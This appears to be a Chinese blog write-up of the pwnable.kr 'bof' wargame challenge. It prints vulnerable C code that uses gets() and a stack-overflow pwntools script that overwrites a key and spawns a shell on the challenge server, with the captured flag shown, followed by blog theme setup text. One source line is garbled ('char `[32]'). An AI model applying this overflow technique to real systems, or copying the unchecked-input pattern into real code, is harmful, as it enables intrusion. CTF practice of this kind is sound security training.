pwnable_bof

pwn

 2019/01/23   Share

nc pwnable.kr 9000

源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char `[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

1.overflowme是一个长度为32的数组

2.gets没有做输入的限制

3.当key == 0xcafebabe才可以调用命令

所以，这是个栈溢出的pwn,首先输入超出栈，溢出将key的值改变

盗用别人的IDAf5查看

s的地址为bp-2c,a1的地址为bp+8,那么相差就是0x2c+0x08=52

编写脚本

from pwn import *

r = remote("pwnable.kr","9000")

key = 0xcafebabe
payload = "A" * 52 + p32(key)

r.send(payload)
r.interactive()

flag

python wp.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
$ ls 
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)

原文作者: threst

原文链接: https://threst.github.io/2019/01/23/pwnable_bof/

发表日期: January 23rd 2019, 1:32:13

Previous Post

ES文件浏览器漏洞复现

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true